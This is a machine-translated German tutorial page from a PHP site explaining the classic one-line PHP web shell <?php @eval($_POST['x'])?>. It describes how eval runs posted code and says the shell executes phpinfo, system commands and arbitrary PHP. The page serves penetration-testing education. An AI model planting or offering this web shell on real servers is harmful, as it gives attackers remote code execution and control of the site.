Heim >Backend-Entwicklung >PHP-Problem >So analysieren Sie einen Bildtrojaner in einem Satz in PHP

So analysieren Sie einen Bildtrojaner in einem Satz in PHP

王林
王林Original
2019-09-16 17:58:569470Durchsuche

So analysieren Sie einen Bildtrojaner in einem Satz in PHP

Satz-Trojaner-Analyse

Zuallererst gibt es beim Erlernen der Penetration wahrscheinlich drei Arten von Trojanern: große Pferde, kleine Pferde und ein Satz.

Gebräuchliche Wörter:

<?php @eval($_POST[&#39;x&#39;])?>

Das sollte das gebräuchlichste sein... schauen Sie sich seine Zusammensetzung an.

Die erste ist eine Bewertungsfunktion, gefolgt indem Sie einen Wert mit dem Parameter x posten. Sehen wir uns zunächst an, was die Funktion „eval“ bewirkt.

Offizielle Beschreibung:

Die Funktion eval() berechnet die Zeichenfolge gemäß dem PHP-Code.

Die Zeichenfolge muss gültiger PHP-Code sein und mit einem Semikolon enden.

Wenn im Codestring keine Return-Anweisung aufgerufen wird, wird NULL zurückgegeben. Wenn der Code Parsing-Fehler enthält, gibt die Funktion eval() false zurück.

Syntax:

eval(phpcode)

Um es einfach auszudrücken: Es kann einige PHP-Funktionen und PHP-Code ausführen. Das ist genug.
Auf diese Weise können wir es verstehen viel einfacher. Wäre es nicht besser, wenn wir ihm direkt etwas PHP-Code posten würden?
Zum Beispiel: phpinfo()-Funktion, Systemfunktion usw.

So analysieren Sie einen Bildtrojaner in einem Satz in PHP

Sie können sehen, dass die PHPInfo-Funktion, die ich hier habe, ausgeführt wurde.

Befehlsausführung ist ebenfalls möglich

So analysieren Sie einen Bildtrojaner in einem Satz in PHP

PHP-Code kann ebenfalls reibungslos ausgeführt werden:

So analysieren Sie einen Bildtrojaner in einem Satz in PHP

Empfohlen Video-Tutorial: PHP-Video-Tutorial

Das obige ist der detaillierte Inhalt vonSo analysieren Sie einen Bildtrojaner in einem Satz in PHP. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Stellungnahme:
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn